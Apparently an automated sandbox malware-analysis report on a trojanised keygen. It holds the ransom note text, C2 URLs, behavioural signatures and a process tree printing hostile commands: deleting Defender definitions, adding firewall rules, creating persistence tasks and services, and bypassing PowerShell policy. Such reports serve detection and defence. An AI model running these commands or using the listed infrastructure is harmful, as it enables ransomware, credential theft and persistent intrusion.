Resubmissions
06/04/2021, 13:50
210406-gc51ndzsc2 1026/03/2021, 23:40
210326-d1ybrjhevx 1013/03/2021, 17:16
210313-8s7b52z63e 1005/03/2021, 14:52
210305-34k3zj54f2 1001/03/2021, 13:17
210301-naamxpgf4e 1028/02/2021, 20:46
210228-6q3b959xae 1028/02/2021, 20:15
210228-mbr268za12 1028/02/2021, 18:32
210228-h944b5cpxa 1028/02/2021, 15:10
210228-hnwwpyjy7j 10Analysis
-
max time kernel
387s -
max time network
396s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
28/02/2021, 18:32
Errors
Reason
Machine shutdown
General
-
Target
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
-
Size
9.2MB
-
MD5
b806267b5f3b7760df56396b1cf05e6d
-
SHA1
5166d4c1d3e476281d9e991eababc3e4aa9ec5ad
-
SHA256
f95d12a0dbd8199d16f48d8e4cbe69a8d4ec16c534efb36e52a662664e1c1783
-
SHA512
30e393bb3898edc8ab5fb04e62ce421ddf3903075f59e3880408b300f46bb74a85088336d6e1203b2101152cebeef4c1730290b41ca77604ecb722c8f627328b
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-2w03ajSkK1
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0284oPsw3gUGkv6TOoEMNyhW6VCgrizkAUg4XiClXtVqLCdtl
URLs
https://we.tl/t-2w03ajSkK1
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
rc4.i32
rc4.i32
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
raccoon
Botnet
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Extracted
Family
raccoon
Botnet
e4d9483b3bf93472877ddcf6765b01165102aed5
Attributes
-
url4cnc
https://telete.in/s3santodomingo
rc4.plain
rc4.plain
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Taurus Stealer
Taurus is an infostealer first seen in June 2020.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
DiamondFox payload 2 IoCs
Detects DiamondFox payload in file/memory.
-
Modifies boot configuration data using bcdedit 14 IoCs
-
Nirsoft 5 IoCs
-
Creates new service(s) 1 TTPs
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 63 IoCs
-
Drops file in Windows directory 16 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
GoLang User-Agent 7 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 54 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 25 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 16 IoCs
-
Suspicious use of SendNotifyMessage 14 IoCs
-
Suspicious use of SetWindowsHookEx 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-EM7S3.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-EM7S3.tmp\23E04C4F32EF2158.tmp" /SL5="$401BC,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe79⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2616 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2616 CREDAT:603151 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\3MXF0C76WP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3MXF0C76WP\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3MXF0C76WP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3MXF0C76WP\multitimer.exe" 1 1016⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\822D.tmp.exe"C:\Users\Admin\AppData\Roaming\822D.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\822D.tmp.exe"C:\Users\Admin\AppData\Roaming\822D.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
-
C:\ProgramData\4904031.53"C:\ProgramData\4904031.53"5⤵
- Executes dropped EXE
-
-
C:\ProgramData\3619132.39"C:\ProgramData\3619132.39"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 572EDC59274EDF17338C203276034D5F C2⤵
- Loads dropped DLL
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12" "" "" "6d110b0a3" "0000000000000000" "00000000000005C8" "00000000000005CC"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\992.exeC:\Users\Admin\AppData\Local\Temp\992.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\f67e0f07-41c7-433d-9e27-e31400b32aef" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\992.exe"C:\Users\Admin\AppData\Local\Temp\992.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin1.exe"C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin1.exe"C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin1.exe" --Admin4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps16⤵
-
-
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all5⤵
- Deletes Windows Defender Definitions
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin2.exe"C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin2.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin.exe"C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\5.exe"C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\5.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\5c24f65d-ab28-49e4-9981-65dca4d245c0\5.exe & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\17B6.exeC:\Users\Admin\AppData\Local\Temp\17B6.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo dbvicTgbw2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx2⤵
-
C:\Windows\SysWOW64\cmd.execmd3⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^LclAMwrfJRiNjlhXSZlDfaVoPHKJbmmurUsqCCnZoBJcKzCAVHAPrJFaAwLysxRlswKsShcdBlcNJmnvylNPZKexfZmARaINKmtIIlHIjlhThRJqDgquGwlHZdeTNUnpBHrpcPNVCyDPvpu$" Venuto.wks4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comBenedetto.com Amano.psd4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comC:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.com Amano.psd5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.comC:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.com6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Benedetto.com /f & erase C:\Users\Admin\AppData\Local\Temp\iWITnJBnWfgAPAKrb\Benedetto.com & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Benedetto.com /f8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1D91.exeC:\Users\Admin\AppData\Local\Temp\1D91.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 9682⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Users\Admin\AppData\Local\Temp\2B19.exeC:\Users\Admin\AppData\Local\Temp\2B19.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jcapsenc\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kxjgzmrb.exe" C:\Windows\SysWOW64\jcapsenc\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create jcapsenc binPath= "C:\Windows\SysWOW64\jcapsenc\kxjgzmrb.exe /d\"C:\Users\Admin\AppData\Local\Temp\2B19.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description jcapsenc "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jcapsenc2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3D04.exeC:\Users\Admin\AppData\Local\Temp\3D04.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\jcapsenc\kxjgzmrb.exeC:\Windows\SysWOW64\jcapsenc\kxjgzmrb.exe /d"C:\Users\Admin\AppData\Local\Temp\2B19.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
-
-
C:\Users\Admin\AppData\Local\Temp\4ED1.exeC:\Users\Admin\AppData\Local\Temp\4ED1.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4ED1.exeC:\Users\Admin\AppData\Local\Temp\4ED1.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\6233.exeC:\Users\Admin\AppData\Local\Temp\6233.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\6B19.exeC:\Users\Admin\AppData\Local\Temp\6B19.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7815.exeC:\Users\Admin\AppData\Local\Temp\7815.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7815.exe"C:\Users\Admin\AppData\Local\Temp\7815.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
